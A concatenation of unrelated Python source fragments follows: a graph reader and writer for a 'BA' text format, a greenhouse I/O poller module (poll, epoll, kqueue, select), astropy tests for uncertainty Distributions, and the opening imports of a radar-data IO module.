                    _found = [int(_num) for _num in re.findall(r'^\d+', _line)]
                except ValueError:
                    self._stream.close()
                    raise ParseFileError('Parse error in `{0}` @ {1}'.format(self._filepath, self._line_no))
                if len(_found) == 1:
                    if _state == 1:
                        # Stored index must match the one expected next.
                        if self._actual_index != _found[0]:
                            self._stream.close()
                            raise ParseFileError(
                                'Parse error (index) in `{0}` @ {1}'.format(self._filepath, self._line_no))
                    elif _state == 2:
                        _order = _found[0]
                        if _order < 1:
                            self._stream.close()
                            raise ParseFileError(
                                'Parse error (order) in `{0}` @ {1}'.format(self._filepath, self._line_no))
                        _gph.add_nodes_from(range(_order))
                    else:
                        self._stream.close()
                        raise RuntimeError('Oops!')  # !!!!!! wtf
                    _state += 1
                else:
                    self._stream.close()
                    raise ParseFileError(
                        'Data length mismatch at line {} @ {}'.format(self._line_no, self._filepath))
            elif _state == 3:
                # Adjacency line for vertex `_vertex_no`: all integers on it.
                try:
                    _found = [int(_num) for _num in re.findall(r'\d+', _line)]
                except ValueError:
                    self._stream.close()
                    raise ParseFileError('Parse error in `{0}` @ {1}'.format(self._filepath, self._line_no))
                for _v in _found:
                    if _v < 0 or _v >= _order:
                        raise ParseFileError(
                            'Unknown vertex at line {1} : {0}'.format(self._filepath, self._line_no))
                    # Add each edge once only, from its lower-numbered endpoint.
                    if _v >= _vertex_no:
                        _gph.add_edge(_vertex_no, _v)
                _vertex_no += 1
                if _vertex_no == _order:  # we read all vertices at the moment
                    break
        if not some_line_read:
            raise ParseFileError("File '{0}' not likely in `BA` format.".format(self._filepath))
        self._last_read += 1
        self._actual_index += 1
        return _gph

    # def actual_index(self):
    #     return self._actual_index

    def last_read(self):
        # How many graphs the current iteration has yielded so far.
        return self._last_read

    def filename(self):
        return self._filepath
def _nxgph_to_str(gph: nx.Graph):
    """Serialize *gph* into BA record text: the order on the first line,
    then one line per vertex listing its neighbours as positional indices.

    Works with both NetworkX 1.x and 2.x: ``nodes()`` is materialized into a
    list (the 2.x ``NodeView`` has no ``.index()``), and ``neighbors()`` is
    used instead of ``neighbors_iter()``, which was removed in NetworkX 2.0.
    """
    _ret = ''
    _vs = list(gph.nodes())
    _ret += '{0}\n'.format(len(_vs))
    for _v in _vs:
        _ret += ' '.join(['{0}'.format(_vs.index(_u)) for _u in gph.neighbors(_v)])
        _ret += '\n'
    return _ret
class GraphWriterBA(object):
    """Writer producing graph catalogues in the `BA` text format.

    Graph records are buffered in memory and flushed by :meth:`close` (or on
    garbage collection).  When more than ``fbound`` graphs are written, the
    output is split into numbered part files (``name.pN.ext``).
    """
    # Hard upper limit on graphs per output file part.
    _max_bound = 2 ** 15 - 1

    @classmethod
    def default_extension(self):
        # NOTE(review): first parameter is the class despite being named `self`.
        return '.ba'

    def __init__(self, path: str, fbound=None):
        if path is None:
            raise TypeError('`None` not allowed for `path`.')
        self._data_written = False  # becomes True after the first write()
        _dirname = dirname(abspath(path))
        if not (isdir(_dirname)):
            raise RuntimeError('Directory does not exist: {0}'.format(_dirname))
        _filename = basename(abspath(path))
        self._filename = join(_dirname, _filename)
        # self._filename += '.ba'
        if isdir(join(_dirname, _filename)):
            raise RuntimeError('The directory: {0}'.format(self._filename))
        # self._tstream = tempfile.TemporaryFile(mode='w+t', encoding='ascii')
        self._buffer = []  # serialized graph records awaiting a dump
        # Fall back to the maximum when fbound is missing or out of range.
        if fbound is None or not (isinstance(fbound, int)) or not (0 <= fbound <= GraphWriterBA._max_bound):
            self._fbound = GraphWriterBA._max_bound
        else:
            self._fbound = fbound
        self._actual_graph = 0  # number of graphs written to temporary
        self._part_no = 0  # archive part number
        self._comments = []

    def write(self, gph: nx.Graph, comment=None):
        """Buffer one graph (with optional comment or list of comments)."""
        # Start a new part file when the current one is full.
        if self._actual_graph == self._fbound:
            self._dump(cont=True)
            # self._tstream = tempfile.TemporaryFile(mode='w+t', encoding='ascii')
            self._buffer = []
            self._actual_graph = 0
            self._part_no += 1
        self._actual_graph += 1
        _bline = ''
        # self._tstream.write('{0}\n'.format(self._actual_graph))
        _bline += '{}\n'.format(self._actual_graph)
        if not (comment is None):
            if isinstance(comment, (list, tuple)):
                for _elt in comment:
                    # self._tstream.write('{{ {0} }}\n'.format(_elt))
                    _bline += '{{ {0} }}\n'.format(_elt)
            else:
                # self._tstream.write('{{ {0} }}\n'.format(comment))
                _bline += '{{ {0} }}\n'.format(comment)
        # self._tstream.write('{0}'.format(_nxgph_to_str(gph)))
        _bline += '{0}'.format(_nxgph_to_str(gph))
        # self._tstream.flush()
        self._buffer.append(_bline)
        self._data_written = True

    # def __enter__(self):
    #     return self
    #
    # def __exit__(self, exc_type, exc_val, exc_tb):
    #     self._dump()

    def __del__(self):
        self._dump()

    def _dump(self, cont=False):
        """Flush buffered graphs to disk, as a part file when splitting."""
        if cont or self._part_no > 0:
            _ext_parts = splitext(self._filename)
            _lfilename = '{0}.p{1}{2}'.format(_ext_parts[0], self._part_no, _ext_parts[1])
        else:
            _lfilename = self._filename
        # if self._tstream and self._data_written:
        if self._buffer and self._data_written:
            try:
                # self._tstream.seek(0)
                rfile = open(_lfilename, 'w', encoding='ascii', newline='\r\n')
                rfile.write('{{bagraph}}\n')
                rfile.write('{{ Created on: {0} }}\n'.format(asctime()))
                rfile.write('{0}\n'.format(self._actual_graph))
                # for _line in self._tstream:
                for _line in self._buffer:
                    rfile.write('{0}\n'.format(_line.strip()))
                rfile.close()
            # NOTE(review): bare `except` hides the original error and may leak
            # the open file handle; consider `except OSError as e: raise ... from e`.
            except:
                raise RuntimeError('Cannot write file: {0}'.format(self._filename))
            finally:
                # self._tstream.close()
                # self._tstream = None
                # del self._buffer[:]
                self._buffer = list()

    def close(self):
        self._dump()
if __name__ == '__main__':
    # Ad-hoc smoke test: read a catalogue and copy it out, splitting the
    # output into parts of 50 graphs each.
    # NOTE(review): input path is machine-specific and will fail elsewhere.
    ipath = '~/_WORK_/_DEPRECATED_/snarkx-py/snarkx/resources/SKLAD'
    opath = '.'
    ofilename = 'vystup.txt'
    ifilename = 'BICRIT.32'
    reader = GraphReaderBA(ipath + '/' + ifilename)  # expanduser handles '~'
    writer = GraphWriterBA(opath + '/' + ofilename, 50)
    gno = 0
    for graph in reader:
        gno += 1
        print('Graph no {0} with order {1}'.format(gno, len(graph)))
        writer.write(graph)
    writer.close()
| |
from __future__ import absolute_import

import collections
import errno
import operator
import select
import sys
from functools import reduce

_original_select = select.select
class Poll(object):
    "a greenhouse poller using the poll system call"
    INMASK = getattr(select, 'POLLIN', 0)
    OUTMASK = getattr(select, 'POLLOUT', 0)
    ERRMASK = getattr(select, 'POLLERR', 0) | getattr(select, "POLLHUP", 0)
    _POLLER = getattr(select, "poll", None)

    def __init__(self):
        self._poller = self._POLLER()
        # fd -> {registration counter -> eventmask}; multiple independent
        # registrations may exist for the same fd.
        self._registry = collections.defaultdict(dict)
        self._counter = 0

    def register(self, fd, eventmask=None):
        """Add a registration for *fd* and return its counter token."""
        # integer file descriptor
        fd = fd if isinstance(fd, int) else fd.fileno()
        # mask nothing by default
        if eventmask is None:
            eventmask = self.INMASK | self.OUTMASK | self.ERRMASK
        # get the current registrations dictionary
        registrations = self._registry[fd]
        # .values() (not py2-only .itervalues()); reduce comes from functools
        registered = reduce(
            operator.or_, registrations.values(), 0)
        # update registrations in the OS poller
        self._update_registration(fd, registered, registered | eventmask)
        # store the registration
        self._counter += 1
        registrations[self._counter] = eventmask
        return self._counter

    def unregister(self, fd, counter):
        """Remove the registration identified by (*fd*, *counter*)."""
        # integer file descriptor
        fd = fd if isinstance(fd, int) else fd.fileno()
        registrations = self._registry[fd]
        # allow for extra noop calls
        if counter not in registrations:
            self._registry.pop(fd)
            return
        mask = registrations.pop(counter)
        the_rest = reduce(operator.or_, registrations.values(), 0)
        # update the OS poller's registration
        self._update_registration(fd, the_rest | mask, the_rest)
        if not registrations:
            self._registry.pop(fd)

    def poll(self, timeout):
        """Poll once; *timeout* is in seconds (None blocks indefinitely)."""
        if timeout is not None:
            timeout *= 1000  # poll() takes milliseconds
        return self._poller.poll(timeout)

    def _update_registration(self, fd, from_mask, to_mask):
        # Sync the OS poller with a registration mask transition for fd.
        if from_mask != to_mask:
            if from_mask and to_mask:
                self._poller.modify(fd, to_mask)
            elif from_mask:
                self._poller.unregister(fd)
            elif to_mask:
                self._poller.register(fd, to_mask)

    def supports(self, fd):
        """Report whether the OS poller accepts *fd*, by probing it."""
        if not isinstance(fd, int):
            fd = fd.fileno()
        try:
            self._poller.register(fd)
        except EnvironmentError:
            return False
        self._poller.unregister(fd)
        return True
class Epoll(Poll):
    "a greenhouse poller utilizing the 2.6+ stdlib's epoll support"
    INMASK = getattr(select, 'EPOLLIN', 0)
    OUTMASK = getattr(select, 'EPOLLOUT', 0)
    ERRMASK = getattr(select, 'EPOLLERR', 0) | getattr(select, "EPOLLHUP", 0)
    _POLLER = getattr(select, "epoll", None)

    def poll(self, timeout):
        # epoll's poll() takes seconds and -1 for "wait forever", unlike the
        # base class, which converts its timeout to milliseconds.
        return self._poller.poll(-1 if timeout is None else timeout)
class KQueue(Poll):
    "a greenhouse poller using the 2.6+ stdlib's kqueue support"
    # kqueue has no poll-style bitmask API, so define our own mask values.
    INMASK = 1
    OUTMASK = 2
    ERRMASK = 0
    _POLLER = getattr(select, "kqueue", None)
    # Map kqueue filter constants back onto our mask values.
    _mask_map = {
        getattr(select, "KQ_FILTER_READ", 0): INMASK,
        getattr(select, "KQ_FILTER_WRITE", 0): OUTMASK,
    }

    def poll(self, timeout):
        # At most two events (read + write) per registered fd.
        evs = self._poller.control(None, 2 * len(self._registry), timeout)
        return [(ev.ident, self._mask_map[ev.filter]) for ev in evs]

    def _update_registration(self, fd, from_mask, to_mask):
        """Translate a mask transition into kevent ADD/DELETE operations."""
        if from_mask == to_mask:
            return
        xor = from_mask ^ to_mask
        to_add = to_mask & xor    # bits newly set
        to_drop = from_mask & xor  # bits newly cleared
        assert not to_add & to_drop  # simple sanity
        events = []
        if to_add & self.INMASK:
            events.append(select.kevent(
                fd, select.KQ_FILTER_READ, select.KQ_EV_ADD))
        elif to_drop & self.INMASK:
            events.append(select.kevent(
                fd, select.KQ_FILTER_READ, select.KQ_EV_DELETE))
        if to_add & self.OUTMASK:
            events.append(select.kevent(
                fd, select.KQ_FILTER_WRITE, select.KQ_EV_ADD))
        elif to_drop & self.OUTMASK:
            events.append(select.kevent(
                fd, select.KQ_FILTER_WRITE, select.KQ_EV_DELETE))
        if events:
            if sys.platform == 'darwin':
                # busted OS X kqueue only accepts 1 kevent at a time
                for event in events:
                    self._poller.control([event], 0)
            else:
                self._poller.control(events, 0)
class Select(object):
    "a greenhouse poller using the select system call"
    INMASK = 1
    OUTMASK = 2
    ERRMASK = 4

    def __init__(self):
        # fd -> {registration counter -> eventmask}
        self._registry = collections.defaultdict(dict)
        # fd -> OR of all masks currently registered for that fd
        self._currentmasks = {}
        self._counter = 0

    def register(self, fd, eventmask=None):
        """Add a registration for *fd* and return its counter token."""
        # integer file descriptor
        fd = fd if isinstance(fd, int) else fd.fileno()
        # mask nothing by default
        if eventmask is None:
            eventmask = self.INMASK | self.OUTMASK | self.ERRMASK
        # store the registration
        self._counter += 1
        self._registry[fd][self._counter] = eventmask
        # update the full mask
        self._currentmasks[fd] = self._currentmasks.get(fd, 0) | eventmask
        return self._counter

    def unregister(self, fd, counter):
        """Remove the registration identified by (*fd*, *counter*)."""
        # integer file descriptor
        fd = fd if isinstance(fd, int) else fd.fileno()
        # just drop it from the registrations dict
        self._registry.get(fd, {}).pop(counter, None)
        # rewrite the full mask; .values() works on both py2 and py3
        newmask = reduce(
            operator.or_, self._registry[fd].values(), 0)
        if newmask:
            self._currentmasks[fd] = newmask
        else:
            self._currentmasks.pop(fd, 0)
        if not self._registry[fd]:
            self._registry.pop(fd)

    def poll(self, timeout):
        """Run select() once and return a list of (fd, eventmask) pairs."""
        rlist, wlist, xlist = [], [], []
        # .items() works on both py2 and py3 (.iteritems() was py2-only)
        for fd, eventmask in self._currentmasks.items():
            if eventmask & self.INMASK:
                rlist.append(fd)
            if eventmask & self.OUTMASK:
                wlist.append(fd)
            if eventmask & self.ERRMASK:
                xlist.append(fd)
        rlist, wlist, xlist = _original_select(rlist, wlist, xlist, timeout)
        events = collections.defaultdict(int)
        for fd in rlist:
            events[fd] |= self.INMASK
        for fd in wlist:
            events[fd] |= self.OUTMASK
        for fd in xlist:
            events[fd] |= self.ERRMASK
        # materialize for py2 parity (py3 items() is a lazy view)
        return list(events.items())

    def supports(self, fd):
        # it might lie though
        return True
def best():
    """Return a poller built on the best facility this platform offers."""
    for facility, poller_cls in (('epoll', Epoll), ('kqueue', KQueue), ('poll', Poll)):
        if hasattr(select, facility):
            return poller_cls()
    return Select()
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from astropy import units as u
from astropy.coordinates import Angle
from astropy.uncertainty.core import Distribution
from astropy.uncertainty import distributions as ds
from astropy.utils import NumpyRNGContext
from astropy.tests.helper import assert_quantity_allclose
from astropy.utils.compat.optional_deps import HAS_SCIPY # noqa
if HAS_SCIPY:
    from scipy.stats import norm  # pylint: disable=W0611
    # Scale factor relating the median absolute deviation of a normal
    # distribution to its standard deviation (1 / Phi^-1(0.75)).
    SMAD_FACTOR = 1 / norm.ppf(0.75)
class TestInit:
    """Construction of ``Distribution`` from plain arrays and Quantities."""
    @classmethod
    def setup_class(self):
        # 4 Poisson rates sampled 1000 times; samples along the last axis
        self.rates = np.array([1, 5, 30, 400])[:, np.newaxis]
        self.parr = np.random.poisson(self.rates, (4, 1000))
        # same data but generated with the sample axis first
        self.parr_t = np.random.poisson(self.rates.squeeze(), (1000, 4))

    def test_numpy_init(self):
        # Test that we can initialize directly from a Numpy array
        Distribution(self.parr)

    def test_numpy_init_T(self):
        Distribution(self.parr_t.T)

    def test_quantity_init(self):
        # Test that we can initialize directly from a Quantity
        pq = self.parr << u.ct
        pqd = Distribution(pq)
        assert isinstance(pqd, u.Quantity)
        assert isinstance(pqd, Distribution)
        assert isinstance(pqd.value, Distribution)
        assert_array_equal(pqd.value.distribution, self.parr)

    def test_quantity_init_T(self):
        # Test that we can initialize directly from a Quantity
        pq = self.parr_t << u.ct
        Distribution(pq.T)

    def test_quantity_init_with_distribution(self):
        # Test that we can initialize a Quantity from a Distribution.
        pd = Distribution(self.parr)
        qpd = pd << u.ct
        assert isinstance(qpd, u.Quantity)
        assert isinstance(qpd, Distribution)
        assert qpd.unit == u.ct
        assert_array_equal(qpd.value.distribution, pd.distribution.astype(float))
def test_init_scalar():
    """A scalar sample is rejected with an informative TypeError."""
    rates = np.array([1, 5, 30, 400])[:, np.newaxis]
    samples = np.random.poisson(rates, (4, 1000))
    with pytest.raises(TypeError) as exc:
        Distribution(samples.ravel()[0])
    assert exc.value.args[0] == "Attempted to initialize a Distribution with a scalar"
class TestDistributionStatistics():
    """Summary statistics (mean/std/var/median/MAD/percentiles) and arithmetic."""
    def setup_class(self):
        # 4 normal distributions with means [1..4] kpc and stds [3, 2, 4, 5] kpc.
        # NOTE(review): pytest invokes setup_class on the class even without
        # @classmethod, so `self` here is actually the class.
        with NumpyRNGContext(12345):
            self.data = np.random.normal(np.array([1, 2, 3, 4])[:, np.newaxis],
                                         np.array([3, 2, 4, 5])[:, np.newaxis],
                                         (4, 10000))
        self.distr = Distribution(self.data * u.kpc)

    def test_shape(self):
        # Distribution shape
        assert self.distr.shape == (4, )
        assert self.distr.distribution.shape == (4, 10000)

    def test_size(self):
        # Total number of values
        assert self.distr.size == 4
        assert self.distr.distribution.size == 40000

    def test_n_samples(self):
        # Number of samples
        assert self.distr.n_samples == 10000

    def test_n_distr(self):
        assert self.distr.shape == (4,)

    def test_pdf_mean(self):
        # Mean of each PDF
        expected = np.mean(self.data, axis=-1) * self.distr.unit
        pdf_mean = self.distr.pdf_mean()
        assert_quantity_allclose(pdf_mean, expected)
        assert_quantity_allclose(pdf_mean, [1, 2, 3, 4] * self.distr.unit, rtol=0.05)
        # make sure the right type comes out - should be a Quantity because it's
        # now a summary statistic
        assert not isinstance(pdf_mean, Distribution)
        assert isinstance(pdf_mean, u.Quantity)
        # Check with out argument.
        out = pdf_mean * 0.
        pdf_mean2 = self.distr.pdf_mean(out=out)
        assert pdf_mean2 is out
        assert np.all(pdf_mean2 == pdf_mean)

    def test_pdf_std(self):
        # Standard deviation of each PDF
        expected = np.std(self.data, axis=-1) * self.distr.unit
        pdf_std = self.distr.pdf_std()
        assert_quantity_allclose(pdf_std, expected)
        assert_quantity_allclose(pdf_std, [3, 2, 4, 5] * self.distr.unit, rtol=0.05)
        # make sure the right type comes out - should be a Quantity because it's
        # now a summary statistic
        assert not isinstance(pdf_std, Distribution)
        assert isinstance(pdf_std, u.Quantity)
        # Check with proper ddof, using out argument.
        out = pdf_std * 0.
        expected = np.std(self.data, axis=-1, ddof=1) * self.distr.unit
        pdf_std2 = self.distr.pdf_std(ddof=1, out=out)
        assert pdf_std2 is out
        assert np.all(pdf_std2 == expected)

    def test_pdf_var(self):
        # Variance of each PDF
        expected = np.var(self.data, axis=-1) * self.distr.unit**2
        pdf_var = self.distr.pdf_var()
        assert_quantity_allclose(pdf_var, expected)
        assert_quantity_allclose(pdf_var, [9, 4, 16, 25] * self.distr.unit**2, rtol=0.1)
        # make sure the right type comes out - should be a Quantity because it's
        # now a summary statistic
        assert not isinstance(pdf_var, Distribution)
        assert isinstance(pdf_var, u.Quantity)
        # Check with proper ddof, using out argument.
        out = pdf_var * 0.
        expected = np.var(self.data, axis=-1, ddof=1) * self.distr.unit**2
        pdf_var2 = self.distr.pdf_var(ddof=1, out=out)
        assert pdf_var2 is out
        assert np.all(pdf_var2 == expected)

    def test_pdf_median(self):
        # Median of each PDF
        expected = np.median(self.data, axis=-1) * self.distr.unit
        pdf_median = self.distr.pdf_median()
        assert_quantity_allclose(pdf_median, expected)
        assert_quantity_allclose(pdf_median, [1, 2, 3, 4] * self.distr.unit, rtol=0.1)
        # make sure the right type comes out - should be a Quantity because it's
        # now a summary statistic
        assert not isinstance(pdf_median, Distribution)
        assert isinstance(pdf_median, u.Quantity)
        # Check with out argument.
        out = pdf_median * 0.
        pdf_median2 = self.distr.pdf_median(out=out)
        assert pdf_median2 is out
        assert np.all(pdf_median2 == expected)

    @pytest.mark.skipif(not HAS_SCIPY, reason='no scipy')
    def test_pdf_mad_smad(self):
        # Median absolute deviation of each PDF
        median = np.median(self.data, axis=-1, keepdims=True)
        expected = np.median(np.abs(self.data - median), axis=-1) * self.distr.unit
        pdf_mad = self.distr.pdf_mad()
        assert_quantity_allclose(pdf_mad, expected)
        # scaled MAD should estimate the standard deviation
        pdf_smad = self.distr.pdf_smad()
        assert_quantity_allclose(pdf_smad, pdf_mad * SMAD_FACTOR, rtol=1e-5)
        assert_quantity_allclose(pdf_smad, [3, 2, 4, 5] * self.distr.unit, rtol=0.05)
        # make sure the right type comes out - should be a Quantity because it's
        # now a summary statistic
        assert not isinstance(pdf_mad, Distribution)
        assert isinstance(pdf_mad, u.Quantity)
        assert not isinstance(pdf_smad, Distribution)
        assert isinstance(pdf_smad, u.Quantity)
        # Check out argument for smad (which checks mad too).
        out = pdf_smad * 0.
        pdf_smad2 = self.distr.pdf_smad(out=out)
        assert pdf_smad2 is out
        assert np.all(pdf_smad2 == pdf_smad)

    def test_percentile(self):
        expected = np.percentile(self.data, [10, 50, 90], axis=-1) * self.distr.unit
        percs = self.distr.pdf_percentiles([10, 50, 90])
        assert_quantity_allclose(percs, expected)
        assert percs.shape == (3, 4)
        # make sure the right type comes out - should be a Quantity because it's
        # now a summary statistic
        assert not isinstance(percs, Distribution)
        assert isinstance(percs, u.Quantity)

    def test_add_quantity(self):
        # adding a plain Quantity shifts the median but not the variance
        distrplus = self.distr + [2000, 0, 0, 500] * u.pc
        expected = (np.median(self.data, axis=-1) + np.array([2, 0, 0, 0.5])) * self.distr.unit
        assert_quantity_allclose(distrplus.pdf_median(), expected)
        expected = np.var(self.data, axis=-1) * self.distr.unit**2
        assert_quantity_allclose(distrplus.pdf_var(), expected)

    def test_add_distribution(self):
        another_data = (np.random.randn(4, 10000)
                        * np.array([1000, .01, 80, 10])[:, np.newaxis]
                        + np.array([2000, 0, 0, 500])[:, np.newaxis])
        # another_data is in pc, but main distr is in kpc
        another_distr = Distribution(another_data * u.pc)
        combined_distr = self.distr + another_distr
        expected = np.median(self.data + another_data/1000,
                             axis=-1) * self.distr.unit
        assert_quantity_allclose(combined_distr.pdf_median(), expected)
        expected = np.var(self.data + another_data/1000, axis=-1) * self.distr.unit**2
        assert_quantity_allclose(combined_distr.pdf_var(), expected)
def test_helper_normal_samples():
    """ds.normal draws samples with the requested shape, unit, and spread."""
    centerq = [1, 5, 30, 400] * u.kpc
    with NumpyRNGContext(12345):
        n_dist = ds.normal(centerq, std=[0.2, 1.5, 4, 1]*u.kpc, n_samples=100)
        assert n_dist.distribution.shape == (4, 100)
        assert n_dist.shape == (4, )
        assert n_dist.unit == u.kpc
        assert np.all(n_dist.pdf_std() > 100*u.pc)
        # a std given in pc must yield a correspondingly tight spread
        n_dist2 = ds.normal(centerq, std=[0.2, 1.5, 4, 1]*u.pc, n_samples=20000)
        assert n_dist2.distribution.shape == (4, 20000)
        assert n_dist2.shape == (4, )
        assert n_dist2.unit == u.kpc
        assert np.all(n_dist2.pdf_std() < 100*u.pc)
def test_helper_poisson_samples():
    """ds.poisson draws non-negative counts centered on the given rates."""
    centerqcounts = [1, 5, 30, 400] * u.count
    with NumpyRNGContext(12345):
        p_dist = ds.poisson(centerqcounts, n_samples=100)
        assert p_dist.shape == (4,)
        assert p_dist.distribution.shape == (4, 100)
        assert p_dist.unit == u.count
        # reducing over all axes yields a scalar Distribution
        p_min = np.min(p_dist)
        assert isinstance(p_min, Distribution)
        assert p_min.shape == ()
        assert np.all(p_min >= 0)
        assert np.all(np.abs(p_dist.pdf_mean() - centerqcounts) < centerqcounts)
def test_helper_uniform_samples():
    """ds.uniform respects lower/upper bounds and the center/width form."""
    udist = ds.uniform(lower=[1, 2]*u.kpc, upper=[3, 4]*u.kpc, n_samples=1000)
    assert udist.shape == (2, )
    assert udist.distribution.shape == (2, 1000)
    assert np.all(np.min(udist.distribution, axis=-1) > [1, 2]*u.kpc)
    assert np.all(np.max(udist.distribution, axis=-1) < [3, 4]*u.kpc)
    # try the alternative creator
    udist = ds.uniform(center=[1, 3, 2] * u.pc, width=[5, 4, 3] * u.pc, n_samples=1000)
    assert udist.shape == (3, )
    assert udist.distribution.shape == (3, 1000)
    assert np.all(np.min(udist.distribution, axis=-1) > [-1.5, 1, 0.5]*u.pc)
    assert np.all(np.max(udist.distribution, axis=-1) < [3.5, 5, 3.5]*u.pc)
def test_helper_normal_exact():
    """Placeholder for analytic (sample-free) normal distributions."""
    pytest.skip('distribution stretch goal not yet implemented')
    centerq = [1, 5, 30, 400] * u.kpc
    ds.normal(centerq, std=[0.2, 1.5, 4, 1]*u.kpc)
    ds.normal(centerq, var=[0.04, 2.25, 16, 1]*u.kpc**2)
    ds.normal(centerq, ivar=[25, 0.44444444, 0.625, 1]*u.kpc**-2)
def test_helper_poisson_exact():
    """Placeholder: analytic Poisson requires dimensionless centers."""
    pytest.skip('distribution stretch goal not yet implemented')
    centerq = [1, 5, 30, 400] * u.one
    ds.poisson(centerq, n_samples=1000)
    with pytest.raises(u.UnitsError) as exc:
        centerq = [1, 5, 30, 400] * u.kpc
        ds.poisson(centerq, n_samples=1000)
    assert exc.value.args[0] == ("Poisson distribution can only be computed "
                                 "for dimensionless quantities")
def test_reprs():
    """repr/str/latex renderings of a Distribution advertise the sample count."""
    distr = Distribution(np.arange(30).reshape(3, 10) * u.kpc)
    for rendered in (repr(distr), str(distr)):
        assert 'n_samples=10' in rendered
    assert r'n_{\rm samp}=10' in distr._repr_latex_()
@pytest.mark.parametrize("func, kws", [
    (ds.normal, {'center': 0, 'std': 2}),
    (ds.uniform, {'lower': 0, 'upper': 2}),
    (ds.poisson, {'center': 2}),
    (ds.normal, {'center': 0*u.count, 'std': 2*u.count}),
    (ds.uniform, {'lower': 0*u.count, 'upper': 2*u.count}),
    (ds.poisson, {'center': 2*u.count})
])
def test_wrong_kw_fails(func, kws):
    """A misspelled keyword is rejected; the correct spelling is accepted."""
    with pytest.raises(Exception):
        kw_temp = kws.copy()
        kw_temp['n_sample'] = 100  # note the missing "s"
        assert func(**kw_temp).n_samples == 100
    kw_temp = kws.copy()
    kw_temp['n_samples'] = 100
    assert func(**kw_temp).n_samples == 100
def test_index_assignment_quantity():
    """Unpacking a quantity Distribution yields Distribution elements."""
    arr = np.random.randn(2, 1000)
    distr = Distribution(arr*u.kpc)
    d1q, d2q = distr
    assert isinstance(d1q, Distribution)
    assert isinstance(d2q, Distribution)
    ndistr = ds.normal(center=[1, 2]*u.kpc, std=[3, 4]*u.kpc, n_samples=1000)
    n1, n2 = ndistr
    assert isinstance(n1, ds.Distribution)
    assert isinstance(n2, ds.Distribution)
def test_index_assignment_array():
    """Unpacking a plain-array Distribution yields Distribution elements."""
    arr = np.random.randn(2, 1000)
    distr = Distribution(arr)
    d1a, d2a = distr
    assert isinstance(d1a, Distribution)
    assert isinstance(d2a, Distribution)
    ndistr = ds.normal(center=[1, 2], std=[3, 4], n_samples=1000)
    n1, n2 = ndistr
    assert isinstance(n1, ds.Distribution)
    assert isinstance(n2, ds.Distribution)
def test_histogram():
    """pdf_histogram bins along the sample axis, keeping the distribution shape."""
    samples = np.random.randn(2, 3, 1000)
    counts, bin_edges = Distribution(samples).pdf_histogram(bins=10)
    assert counts.shape == (2, 3, 10)
    assert bin_edges.shape == (2, 3, 11)
def test_array_repr_latex():
    """A plain-array Distribution has no LaTeX repr (ndarray lacks one)."""
    # as of this writing ndarray does not have a _repr_latex_, and this test
    # ensure distributions account for that. However, if in the future ndarray
    # gets a _repr_latex_, we can skip this.
    arr = np.random.randn(4, 1000)
    if hasattr(arr, '_repr_latex_'):
        pytest.skip('in this version of numpy, ndarray has a _repr_latex_')
    distr = Distribution(arr)
    assert distr._repr_latex_() is None
def test_distr_to():
    """Unit conversion of a quantity Distribution preserves the mean."""
    cm_distr = ds.normal(10*u.cm, n_samples=100, std=1*u.cm)
    m_distr = cm_distr.to(u.m)
    assert_quantity_allclose(cm_distr.pdf_mean().to(u.m), m_distr.pdf_mean())
def test_distr_noq_to():
    """.to() is unavailable on a plain-array (non-Quantity) Distribution."""
    # this is an array distribution not a quantity
    arr_distr = ds.normal(10, n_samples=100, std=1)
    with pytest.raises(AttributeError):
        arr_distr.to(u.m)
def test_distr_to_value():
    """to_value() converts units and strips them, preserving the mean."""
    cm_distr = ds.normal(10*u.cm, n_samples=100, std=1*u.cm)
    value_distr = cm_distr.to_value(u.m)
    assert np.allclose(cm_distr.pdf_mean().to_value(u.m), value_distr.pdf_mean())
def test_distr_noq_to_value():
    """to_value() is unavailable on a plain-array Distribution."""
    arr_distr = ds.normal(10, n_samples=100, std=1)
    with pytest.raises(AttributeError):
        arr_distr.to_value(u.m)
def test_distr_angle():
    # Check that Quantity subclasses decay to Quantity appropriately.
    base_distr = Distribution([2., 3., 4.])
    angle_distr = Angle(base_distr, 'deg')

    # Addition keeps the unit (deg), hence keeps the Angle class.
    angle_sum = angle_distr + angle_distr
    assert isinstance(angle_sum, Angle)
    assert isinstance(angle_sum, Distribution)

    # Multiplication changes the unit (deg**2), hence decays to Quantity.
    angle_product = angle_distr * angle_distr
    assert not isinstance(angle_product, Angle)
    assert isinstance(angle_product, u.Quantity)
    assert isinstance(angle_product, Distribution)

    # In-place addition preserves both the Angle and Distribution classes.
    angle_distr += angle_distr
    assert isinstance(angle_distr, Angle)
    assert isinstance(angle_distr, Distribution)
    assert_array_equal(angle_distr.distribution, angle_sum.distribution)

    # In-place multiplication cannot keep an angular unit, so it must fail.
    with pytest.raises(u.UnitTypeError):
        angle_distr *= angle_distr
def test_distr_angle_view_as_quantity():
    # Check that Quantity subclasses decay to Quantity appropriately.
    base_distr = Distribution([2., 3., 4.])
    angle_distr = Angle(base_distr, 'deg')

    quantity_view = angle_distr.view(u.Quantity)
    assert not isinstance(quantity_view, Angle)
    assert isinstance(quantity_view, u.Quantity)
    assert isinstance(quantity_view, Distribution)

    # View directly as the DistributionQuantity class.
    class_view = angle_distr.view(quantity_view.__class__)
    assert not isinstance(class_view, Angle)
    assert isinstance(class_view, u.Quantity)
    assert isinstance(class_view, Distribution)
    assert_array_equal(class_view.distribution, quantity_view.distribution)

    # Same, but with the two-argument (dtype, class) form of view.
    dtype_class_view = angle_distr.view(
        quantity_view.dtype, quantity_view.__class__)
    assert not isinstance(dtype_class_view, Angle)
    assert isinstance(dtype_class_view, u.Quantity)
    assert isinstance(dtype_class_view, Distribution)
    assert_array_equal(
        dtype_class_view.distribution, quantity_view.distribution)
def test_distr_cannot_view_new_dtype():
    # A Distribution has a very specific structured dtype with just one
    # element that holds the array of samples.  Since it is not clear what a
    # view as a new dtype should mean, it is simply an error.
    # TODO: with a lot of thought, this restriction can likely be relaxed.
    plain_distr = Distribution([2., 3., 4.])
    with pytest.raises(ValueError, match='with a new dtype'):
        plain_distr.view(np.dtype('f8'))

    # Check subclass just in case.
    angle_distr = Angle(plain_distr, 'deg')
    with pytest.raises(ValueError, match='with a new dtype'):
        angle_distr.view(np.dtype('f8'))

    # Also the two-argument (dtype, class) form of view.
    with pytest.raises(ValueError, match='with a new dtype'):
        angle_distr.view(np.dtype('f8'), Distribution)
| |
"""IO methods for radar data from MYRORSS or MRMS.
MYRORSS = Multi-year Reanalysis of Remotely Sensed Storms
MRMS = Multi-radar Multi-sensor
"""
import os
import glob
import warnings
import numpy
import pandas
